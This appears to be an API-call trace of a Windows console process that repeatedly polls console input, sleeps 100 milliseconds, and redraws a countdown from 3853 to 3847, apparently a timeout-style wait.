[0232.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0232.746] Sleep (dwMilliseconds=0x64)
[0232.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0232.855] Sleep (dwMilliseconds=0x64)
[0232.964] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0232.964] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0232.964] Sleep (dwMilliseconds=0x64)
[0233.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.073] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0233.073] Sleep (dwMilliseconds=0x64)
[0233.182] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.182] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0233.182] Sleep (dwMilliseconds=0x64)
[0233.292] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.292] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0233.292] Sleep (dwMilliseconds=0x64)
[0233.401] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.401] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6043
[0233.401] Sleep (dwMilliseconds=0x64)
[0233.510] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.510] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0233.510] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083853") returned 8
[0233.510] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0233.511] __iob_func () returned 0x757a2900
[0233.511] _fileno (_File=0x757a2920) returned 1
[0233.511] _errno () returned 0x5507d8
[0233.511] _get_osfhandle (_FileHandle=1) returned 0x4c
[0233.511] _errno () returned 0x5507d8
[0233.511] GetFileType (hFile=0x4c) returned 0x2
[0233.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0233.511] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0233.511] lstrlenW (lpString="\x08\x08\x08\x083853") returned 8
[0233.619] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.619] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0233.619] Sleep (dwMilliseconds=0x64)
[0233.728] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.728] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0233.728] Sleep (dwMilliseconds=0x64)
[0233.840] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.841] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0233.841] Sleep (dwMilliseconds=0x64)
[0233.947] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0233.947] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0233.947] Sleep (dwMilliseconds=0x64)
[0234.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.056] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0234.056] Sleep (dwMilliseconds=0x64)
[0234.166] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.166] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0234.166] Sleep (dwMilliseconds=0x64)
[0234.274] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.274] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0234.274] Sleep (dwMilliseconds=0x64)
[0234.383] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.384] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6044
[0234.384] Sleep (dwMilliseconds=0x64)
[0234.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0234.493] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083852") returned 8
[0234.493] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0234.493] __iob_func () returned 0x757a2900
[0234.493] _fileno (_File=0x757a2920) returned 1
[0234.493] _errno () returned 0x5507d8
[0234.493] _get_osfhandle (_FileHandle=1) returned 0x4c
[0234.493] _errno () returned 0x5507d8
[0234.493] GetFileType (hFile=0x4c) returned 0x2
[0234.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0234.493] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0234.493] lstrlenW (lpString="\x08\x08\x08\x083852") returned 8
[0234.602] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.602] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0234.602] Sleep (dwMilliseconds=0x64)
[0234.711] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.711] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0234.711] Sleep (dwMilliseconds=0x64)
[0234.820] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.820] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0234.821] Sleep (dwMilliseconds=0x64)
[0234.929] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0234.930] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0234.930] Sleep (dwMilliseconds=0x64)
[0235.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.039] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0235.039] Sleep (dwMilliseconds=0x64)
[0235.148] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.148] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0235.148] Sleep (dwMilliseconds=0x64)
[0235.257] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.257] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0235.257] Sleep (dwMilliseconds=0x64)
[0235.367] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.367] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6045
[0235.367] Sleep (dwMilliseconds=0x64)
[0235.475] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.476] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0235.476] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083851") returned 8
[0235.476] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0235.476] __iob_func () returned 0x757a2900
[0235.476] _fileno (_File=0x757a2920) returned 1
[0235.476] _errno () returned 0x5507d8
[0235.476] _get_osfhandle (_FileHandle=1) returned 0x4c
[0235.476] _errno () returned 0x5507d8
[0235.476] GetFileType (hFile=0x4c) returned 0x2
[0235.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0235.476] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0235.476] lstrlenW (lpString="\x08\x08\x08\x083851") returned 8
[0235.585] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.585] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0235.585] Sleep (dwMilliseconds=0x64)
[0235.694] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.694] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0235.694] Sleep (dwMilliseconds=0x64)
[0235.803] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.803] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0235.803] Sleep (dwMilliseconds=0x64)
[0235.912] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0235.912] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0235.913] Sleep (dwMilliseconds=0x64)
[0236.022] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.022] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0236.022] Sleep (dwMilliseconds=0x64)
[0236.131] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.131] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0236.131] Sleep (dwMilliseconds=0x64)
[0236.240] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.240] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0236.240] Sleep (dwMilliseconds=0x64)
[0236.349] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.349] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6046
[0236.349] Sleep (dwMilliseconds=0x64)
[0236.458] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.458] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0236.459] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083850") returned 8
[0236.459] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0236.459] __iob_func () returned 0x757a2900
[0236.459] _fileno (_File=0x757a2920) returned 1
[0236.459] _errno () returned 0x5507d8
[0236.459] _get_osfhandle (_FileHandle=1) returned 0x4c
[0236.459] _errno () returned 0x5507d8
[0236.459] GetFileType (hFile=0x4c) returned 0x2
[0236.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0236.459] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0236.459] lstrlenW (lpString="\x08\x08\x08\x083850") returned 8
[0236.567] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.568] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0236.568] Sleep (dwMilliseconds=0x64)
[0236.677] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.677] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0236.677] Sleep (dwMilliseconds=0x64)
[0236.786] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.786] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0236.786] Sleep (dwMilliseconds=0x64)
[0236.895] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0236.895] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0236.895] Sleep (dwMilliseconds=0x64)
[0237.004] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.004] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0237.004] Sleep (dwMilliseconds=0x64)
[0237.113] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.114] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0237.114] Sleep (dwMilliseconds=0x64)
[0237.232] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.233] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0237.233] Sleep (dwMilliseconds=0x64)
[0237.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0237.332] Sleep (dwMilliseconds=0x64)
[0237.441] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.442] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6047
[0237.442] Sleep (dwMilliseconds=0x64)
[0237.552] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.553] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0237.553] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083849") returned 8
[0237.553] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0237.553] __iob_func () returned 0x757a2900
[0237.553] _fileno (_File=0x757a2920) returned 1
[0237.553] _errno () returned 0x5507d8
[0237.553] _get_osfhandle (_FileHandle=1) returned 0x4c
[0237.553] _errno () returned 0x5507d8
[0237.553] GetFileType (hFile=0x4c) returned 0x2
[0237.553] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0237.553] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0237.553] lstrlenW (lpString="\x08\x08\x08\x083849") returned 8
[0237.662] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.663] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0237.663] Sleep (dwMilliseconds=0x64)
[0237.769] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.769] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0237.769] Sleep (dwMilliseconds=0x64)
[0237.878] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.878] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0237.878] Sleep (dwMilliseconds=0x64)
[0237.987] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0237.987] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0237.987] Sleep (dwMilliseconds=0x64)
[0238.096] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.097] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0238.097] Sleep (dwMilliseconds=0x64)
[0238.206] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.206] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0238.206] Sleep (dwMilliseconds=0x64)
[0238.315] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.315] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0238.315] Sleep (dwMilliseconds=0x64)
[0238.424] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.424] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6048
[0238.424] Sleep (dwMilliseconds=0x64)
[0238.533] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.533] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0238.534] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083848") returned 8
[0238.534] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0238.534] __iob_func () returned 0x757a2900
[0238.534] _fileno (_File=0x757a2920) returned 1
[0238.534] _errno () returned 0x5507d8
[0238.534] _get_osfhandle (_FileHandle=1) returned 0x4c
[0238.534] _errno () returned 0x5507d8
[0238.534] GetFileType (hFile=0x4c) returned 0x2
[0238.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0238.534] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0238.534] lstrlenW (lpString="\x08\x08\x08\x083848") returned 8
[0238.642] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.642] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0238.642] Sleep (dwMilliseconds=0x64)
[0238.751] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.752] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0238.752] Sleep (dwMilliseconds=0x64)
[0238.861] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.861] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0238.861] Sleep (dwMilliseconds=0x64)
[0238.970] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0238.970] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0238.970] Sleep (dwMilliseconds=0x64)
[0239.079] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.079] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0239.079] Sleep (dwMilliseconds=0x64)
[0239.188] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.188] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0239.188] Sleep (dwMilliseconds=0x64)
[0239.297] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.298] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0239.298] Sleep (dwMilliseconds=0x64)
[0239.407] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.407] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6049
[0239.407] Sleep (dwMilliseconds=0x64)
[0239.531] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.532] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0239.532] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083847") returned 8
[0239.532] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0239.532] __iob_func () returned 0x757a2900
[0239.532] _fileno (_File=0x757a2920) returned 1
[0239.532] _errno () returned 0x5507d8
[0239.532] _get_osfhandle (_FileHandle=1) returned 0x4c
[0239.532] _errno () returned 0x5507d8
[0239.532] GetFileType (hFile=0x4c) returned 0x2
[0239.532] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0239.532] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0239.532] lstrlenW (lpString="\x08\x08\x08\x083847") returned 8
[0239.646] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.646] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0239.646] Sleep (dwMilliseconds=0x64)
[0239.750] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0239.750] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd604a
[0239.750] Sleep (dwMilliseconds=0x64)
